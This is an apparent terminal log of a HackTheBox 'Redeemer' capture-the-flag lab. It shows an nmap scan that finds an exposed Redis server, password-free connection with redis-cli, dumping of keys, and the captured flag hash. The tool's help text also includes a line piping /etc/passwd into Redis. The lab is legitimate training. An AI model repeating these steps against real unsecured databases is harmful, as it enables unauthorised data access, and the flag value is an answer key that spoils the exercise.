  "Redeemer" HackTheBox Capture the Flag

  Target IP: 10.129.136.187

# START

┌─[us-starting-point-1-dhcp]─[10.10.14.220]─[heems@htb-kbepmpgdpw]─[~]
└──╼ [★]$ ping 10.129.136.187
PING 10.129.136.187 (10.129.136.187) 56(84) bytes of data.
64 bytes from 10.129.136.187: icmp_seq=1 ttl=63 time=66.3 ms
64 bytes from 10.129.136.187: icmp_seq=2 ttl=63 time=66.3 ms
64 bytes from 10.129.136.187: icmp_seq=3 ttl=63 time=66.1 ms
^C
--- 10.129.136.187 ping statistics ---
3 packets transmitted, 3 received, 0% packet loss, time 2003ms
rtt min/avg/max/mdev = 66.117/66.258/66.338/0.100 ms

┌─[us-starting-point-1-dhcp]─[10.10.14.220]─[heems@htb-kbepmpgdpw]─[~]
└──╼ [★]$ nmap -p- -sV 10.129.136.187
Starting Nmap 7.95 ( https://nmap.org ) at 2026-07-21 04:54 EDT
Nmap scan report for 10.129.136.187
Host is up (0.067s latency).
Not shown: 65534 closed tcp ports (conn-refused)
PORT     STATE SERVICE VERSION
6379/tcp open  redis   Redis key-value store 5.0.7

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 37.99 seconds

┌─[us-starting-point-1-dhcp]─[10.10.14.220]─[heems@htb-kbepmpgdpw]─[~]
└──╼ [★]$ sudo apt install redis-tools
The following package was automatically installed and is no longer required:
  linux-image-6.12.73+deb13-amd64
Use 'sudo apt autoremove' to remove it.

Upgrading:
  redis-tools

Summary:
  Upgrading: 1, Installing: 0, Removing: 0, Not Upgrading: 488
  Download size: 1,245 kB
  Space needed: 0 B / 9,790 MB available

Ign:1 https://deb.parrot.sh/parrot echo/main amd64 redis-tools amd64 5:8.0.2-3+deb13u2
Ign:1 https://deb.parrot.sh/parrot echo/main amd64 redis-tools amd64 5:8.0.2-3+deb13u2
Ign:1 https://deb.parrot.sh/parrot echo/main amd64 redis-tools amd64 5:8.0.2-3+deb13u2
Ign:1 https://deb.parrot.sh/parrot echo/main amd64 redis-tools amd64 5:8.0.2-3+deb13u2
Err:1 https://deb.parrot.sh/parrot echo/main amd64 redis-tools amd64 5:8.0.2-3+deb13u2
  Cannot initiate the connection to deb.parrot.sh:443 (2607:f5b4:1:1c:3:0:1337:c0de). - connect (101: Network is unreachable) Cannot initiate the connection to deb.parrot.sh:443 (2607:f5b4:1:1c:4:0:bad:cafe). - connect (101: Network is unreachable) Cannot initiate the connection to deb.parrot.sh:443 (2607:f5b4:1:1c:4:0:dead:beef). - connect (101: Network is unreachable) Cannot initiate the connection to deb.parrot.sh:443 (2607:f5b4:1:1c:4:0:1337:c0de). - connect (101: Network is unreachable) Cannot initiate the connection to deb.parrot.sh:443 (2607:f5b4:1:1c:3:0:dead:beef). - connect (101: Network is unreachable) Cannot initiate the connection to deb.parrot.sh:443 (2607:f5b4:1:1c:3:0:bad:cafe). - connect (101: Network is unreachable) Could not connect to deb.parrot.sh:443 (23.19.10.59), connection timed out Could not connect to deb.parrot.sh:443 (23.19.10.58), connection timed out
  Cannot initiate the connection to deb.parrot.sh:443 (2607:f5b4:1:1c:3:0:1337:c0de). - connect (101: Network is unreachable) Cannot initiate the connection to deb.parrot.sh:443 (2607:f5b4:1:1c:4:0:bad:cafe). - connect (101: Network is unreachable) Cannot initiate the connection to deb.parrot.sh:443 (2607:f5b4:1:1c:4:0:dead:beef). - connect (101: Network is unreachable) Cannot initiate the connection to deb.parrot.sh:443 (2607:f5b4:1:1c:4:0:1337:c0de). - connect (101: Network is unreachable) Cannot initiate the connection to deb.parrot.sh:443 (2607:f5b4:1:1c:3:0:dead:beef). - connect (101: Network is unreachable) Cannot initiate the connection to deb.parrot.sh:443 (2607:f5b4:1:1c:3:0:bad:cafe). - connect (101: Network is unreachable)
Error: Failed to fetch https://deb.parrot.sh/direct/parrot/pool/main/r/redis/redis-tools_8.0.2-3%2bdeb13u2_amd64.deb  Cannot initiate the connection to deb.parrot.sh:443 (2607:f5b4:1:1c:3:0:1337:c0de). - connect (101: Network is unreachable) Cannot initiate the connection to deb.parrot.sh:443 (2607:f5b4:1:1c:4:0:bad:cafe). - connect (101: Network is unreachable) Cannot initiate the connection to deb.parrot.sh:443 (2607:f5b4:1:1c:4:0:dead:beef). - connect (101: Network is unreachable) Cannot initiate the connection to deb.parrot.sh:443 (2607:f5b4:1:1c:4:0:1337:c0de). - connect (101: Network is unreachable) Cannot initiate the connection to deb.parrot.sh:443 (2607:f5b4:1:1c:3:0:dead:beef). - connect (101: Network is unreachable) Cannot initiate the connection to deb.parrot.sh:443 (2607:f5b4:1:1c:3:0:bad:cafe). - connect (101: Network is unreachable)
Error: Unable to fetch some archives, maybe run apt-get update or try with --fix-missing?

┌─[us-starting-point-1-dhcp]─[10.10.14.220]─[heems@htb-kbepmpgdpw]─[~]
└──╼ [★]$ redis-cli --help
redis-cli 8.0.2

Usage: redis-cli [OPTIONS] [cmd [arg [arg ...]]]
  -h <hostname>      Server hostname (default: 127.0.0.1).
  -p <port>          Server port (default: 6379).
  -t <timeout>       Server connection timeout in seconds (decimals allowed).
                     Default timeout is 0, meaning no limit, depending on the OS.
  -s <socket>        Server socket (overrides hostname and port).
  -a <password>      Password to use when connecting to the server.
                     You can also use the REDISCLI_AUTH environment
                     variable to pass this password more safely
                     (if both are used, this argument takes precedence).
  --user <username>  Used to send ACL style 'AUTH username pass'. Needs -a.
  --pass <password>  Alias of -a for consistency with the new --user option.
  --askpass          Force user to input password with mask from STDIN.
                     If this argument is used, '-a' and REDISCLI_AUTH
                     environment variable will be ignored.
  -u <uri>           Server URI on format redis://user:password@host:port/dbnum
                     User, password and dbnum are optional. For authentication
                     without a username, use username 'default'. For TLS, use
                     the scheme 'rediss'.
  -r <repeat>        Execute specified command N times.
  -i <interval>      When -r is used, waits <interval> seconds per command.
                     It is possible to specify sub-second times like -i 0.1.
                     This interval is also used in --scan and --stat per cycle.
                     and in --bigkeys, --memkeys, --keystats, and --hotkeys per 100 cycles.
  -n <db>            Database number.
  -2                 Start session in RESP2 protocol mode.
  -3                 Start session in RESP3 protocol mode.
  -x                 Read last argument from STDIN (see example below).
  -X                 Read <tag> argument from STDIN (see example below).
  -d <delimiter>     Delimiter between response bulks for raw formatting (default: \n).
  -D <delimiter>     Delimiter between responses for raw formatting (default: \n).
  -c                 Enable cluster mode (follow -ASK and -MOVED redirections).
  -e                 Return exit error code when command execution fails.
  -4                 Prefer IPv4 over IPv6 on DNS lookup.
  -6                 Prefer IPv6 over IPv4 on DNS lookup.
  --tls              Establish a secure TLS connection.
  --sni <host>       Server name indication for TLS.
  --cacert <file>    CA Certificate file to verify with.
  --cacertdir <dir>  Directory where trusted CA certificates are stored.
                     If neither cacert nor cacertdir are specified, the default
                     system-wide trusted root certs configuration will apply.
  --insecure         Allow insecure TLS connection by skipping cert validation.
  --cert <file>      Client certificate to authenticate with.
  --key <file>       Private key file to authenticate with.
  --tls-ciphers <list> Sets the list of preferred ciphers (TLSv1.2 and below)
                     in order of preference from highest to lowest separated by colon (":").
                     See the ciphers(1ssl) manpage for more information about the syntax of this string.
  --tls-ciphersuites <list> Sets the list of preferred ciphersuites (TLSv1.3)
                     in order of preference from highest to lowest separated by colon (":").
                     See the ciphers(1ssl) manpage for more information about the syntax of this string,
                     and specifically for TLSv1.3 ciphersuites.
  --raw              Use raw formatting for replies (default when STDOUT is
                     not a tty).
  --no-raw           Force formatted output even when STDOUT is not a tty.
  --quoted-input     Force input to be handled as quoted strings.
  --csv              Output in CSV format.
  --json             Output in JSON format (default RESP3, use -2 if you want to use with RESP2).
  --quoted-json      Same as --json, but produce ASCII-safe quoted strings, not Unicode.
  --show-pushes <yn> Whether to print RESP3 PUSH messages.  Enabled by default when
                     STDOUT is a tty but can be overridden with --show-pushes no.
  --stat             Print rolling stats about server: mem, clients, ...
  --latency          Enter a special mode continuously sampling latency.
                     If you use this mode in an interactive session it runs
                     forever displaying real-time stats. Otherwise if --raw or
                     --csv is specified, or if you redirect the output to a non
                     TTY, it samples the latency for 1 second (you can use
                     -i to change the interval), then produces a single output
                     and exits.
  --latency-history  Like --latency but tracking latency changes over time.
                     Default time interval is 15 sec. Change it using -i.
  --latency-dist     Shows latency as a spectrum, requires xterm 256 colors.
                     Default time interval is 1 sec. Change it using -i.
  --lru-test <keys>  Simulate a cache workload with an 80-20 distribution.
  --replica          Simulate a replica showing commands received from the master.
  --rdb <filename>   Transfer an RDB dump from remote server to local file.
                     Use filename of "-" to write to stdout.
  --functions-rdb <filename> Like --rdb but only get the functions (not the keys)
                     when getting the RDB dump file.
  --pipe             Transfer raw Redis protocol from stdin to server.
  --pipe-timeout <n> In --pipe mode, abort with error if after sending all data.
                     no reply is received within <n> seconds.
                     Default timeout: 30. Use 0 to wait forever.
  --bigkeys          Sample Redis keys looking for keys with many elements (complexity).
  --memkeys          Sample Redis keys looking for keys consuming a lot of memory.
  --memkeys-samples <n> Sample Redis keys looking for keys consuming a lot of memory.
                     And define number of key elements to sample
  --keystats         Sample Redis keys looking for keys memory size and length (combine bigkeys and memkeys).
  --keystats-samples <n> Sample Redis keys looking for keys memory size and length.
                     And define number of key elements to sample (only for memory usage).
  --cursor <n>       Start the scan at the cursor <n> (usually after a Ctrl-C).
                     Optionally used with --keystats and --keystats-samples.
  --top <n>          To display <n> top key sizes (default: 10).
                     Optionally used with --keystats and --keystats-samples.
  --hotkeys          Sample Redis keys looking for hot keys.
                     only works when maxmemory-policy is *lfu.
  --scan             List all keys using the SCAN command.
  --pattern <pat>    Keys pattern when using the --scan, --bigkeys, --memkeys,
                     --keystats or --hotkeys options (default: *).
  --count <count>    Count option when using the --scan, --bigkeys, --memkeys,
                     --keystats or --hotkeys (default: 10).
  --quoted-pattern <pat> Same as --pattern, but the specified string can be
                         quoted, in order to pass an otherwise non binary-safe string.
  --intrinsic-latency <sec> Run a test to measure intrinsic system latency.
                     The test will run for the specified amount of seconds.
  --eval <file>      Send an EVAL command using the Lua script at <file>.
  --ldb              Used with --eval enable the Redis Lua debugger.
  --ldb-sync-mode    Like --ldb but uses the synchronous Lua debugger, in
                     this mode the server is blocked and script changes are
                     not rolled back from the server memory.
  --cluster <command> [args...] [opts...]
                     Cluster Manager command and arguments (see below).
  --verbose          Verbose mode.
  --no-auth-warning  Don't show warning message when using password on command
                     line interface.
  --help             Output this help and exit.
  --version          Output version and exit.

Cluster Manager Commands:
  Use --cluster help to list all available cluster manager commands.

Examples:
  redis-cli -u redis://default:PASSWORD@localhost:6379/0
  cat /etc/passwd | redis-cli -x set mypasswd
  redis-cli -D "" --raw dump key > key.dump && redis-cli -X dump_tag restore key2 0 dump_tag replace < key.dump
  redis-cli -r 100 lpush mylist x
  redis-cli -r 100 -i 1 info | grep used_memory_human:
  redis-cli --quoted-input set '"null-\x00-separated"' value
  redis-cli --eval myscript.lua key1 key2 , arg1 arg2 arg3
  redis-cli --scan --pattern '*:12345*'
  redis-cli --scan --pattern '*:12345*' --count 100

  (Note: when using --eval the comma separates KEYS[] from ARGV[] items)

When no command is given, redis-cli starts in interactive mode.
Type "help" in interactive mode for information on available commands
and settings.

┌─[us-starting-point-1-dhcp]─[10.10.14.220]─[heems@htb-kbepmpgdpw]─[~]
└──╼ [★]$ redis-cli -h 10.129.136.187
10.129.136.187:6379> info
# Server
redis_version:5.0.7
redis_git_sha1:00000000
redis_git_dirty:0
redis_build_id:66bd629f924ac924
redis_mode:standalone
os:Linux 5.4.0-77-generic x86_64
arch_bits:64
multiplexing_api:epoll
atomicvar_api:atomic-builtin
gcc_version:9.3.0
process_id:750
run_id:c964dcef2bde1505a5f9609b05e3b09cabae098a
tcp_port:6379
uptime_in_seconds:552
uptime_in_days:0
hz:10
configured_hz:10
lru_clock:6239446
executable:/usr/bin/redis-server
config_file:/etc/redis/redis.conf

# Clients
connected_clients:1
client_recent_max_input_buffer:2
client_recent_max_output_buffer:0
blocked_clients:0

# Memory
used_memory:859624
used_memory_human:839.48K
used_memory_rss:5935104
used_memory_rss_human:5.66M
used_memory_peak:859624
used_memory_peak_human:839.48K
used_memory_peak_perc:100.00%
used_memory_overhead:847166
used_memory_startup:797248
used_memory_dataset:12458
used_memory_dataset_perc:19.97%
allocator_allocated:1613720
allocator_active:1949696
allocator_resident:9158656
total_system_memory:2084024320
total_system_memory_human:1.94G
used_memory_lua:41984
used_memory_lua_human:41.00K
used_memory_scripts:0
used_memory_scripts_human:0B
number_of_cached_scripts:0
maxmemory:0
maxmemory_human:0B
maxmemory_policy:noeviction
allocator_frag_ratio:1.21
allocator_frag_bytes:335976
allocator_rss_ratio:4.70
allocator_rss_bytes:7208960
rss_overhead_ratio:0.65
rss_overhead_bytes:-3223552
mem_fragmentation_ratio:7.26
mem_fragmentation_bytes:5117488
mem_not_counted_for_evict:0
mem_replication_backlog:0
mem_clients_slaves:0
mem_clients_normal:49694
mem_aof_buffer:0
mem_allocator:jemalloc-5.2.1
active_defrag_running:0
lazyfree_pending_objects:0

# Persistence
loading:0
rdb_changes_since_last_save:4
rdb_bgsave_in_progress:0
rdb_last_save_time:1784623790
rdb_last_bgsave_status:ok
rdb_last_bgsave_time_sec:-1
rdb_current_bgsave_time_sec:-1
rdb_last_cow_size:0
aof_enabled:0
aof_rewrite_in_progress:0
aof_rewrite_scheduled:0
aof_last_rewrite_time_sec:-1
aof_current_rewrite_time_sec:-1
aof_last_bgrewrite_status:ok
aof_last_write_status:ok
aof_last_cow_size:0

# Stats
total_connections_received:7
total_commands_processed:8
instantaneous_ops_per_sec:0
total_net_input_bytes:346
total_net_output_bytes:15355
instantaneous_input_kbps:0.00
instantaneous_output_kbps:0.00
rejected_connections:0
sync_full:0
sync_partial_ok:0
sync_partial_err:0
expired_keys:0
expired_stale_perc:0.00
expired_time_cap_reached_count:0
evicted_keys:0
keyspace_hits:0
keyspace_misses:0
pubsub_channels:0
pubsub_patterns:0
latest_fork_usec:0
migrate_cached_sockets:0
slave_expires_tracked_keys:0
active_defrag_hits:0
active_defrag_misses:0
active_defrag_key_hits:0
active_defrag_key_misses:0

# Replication
role:master
connected_slaves:0
master_replid:28bd8f62c846410ff358efb1da49362d84455c79
master_replid2:0000000000000000000000000000000000000000
master_repl_offset:0
second_repl_offset:-1
repl_backlog_active:0
repl_backlog_size:1048576
repl_backlog_first_byte_offset:0
repl_backlog_histlen:0

# CPU
used_cpu_sys:0.699370
used_cpu_user:0.594282
used_cpu_sys_children:0.000000
used_cpu_user_children:0.000000

# Cluster
cluster_enabled:0

# Keyspace
db0:keys=4,expires=0,avg_ttl=0

10.129.136.187:6379> select 0
OK

10.129.136.187:6379> keys *
1) "flag"
2) "temp"
3) "stor"
4) "numb"

10.129.136.187:6379> get temp
"1c98492cd337252698d0c5f631dfb7ae"

10.129.136.187:6379> get stor
"e80d635f95686148284526e1980740f8"

10.129.136.187:6379> get numb
"bb2c8a7506ee45cc981eb88bb81dddab"

10.129.136.187:6379> get flag
"03e1d2b376c37ab3f5319922053953eb"

# FLAG CAPTURED!
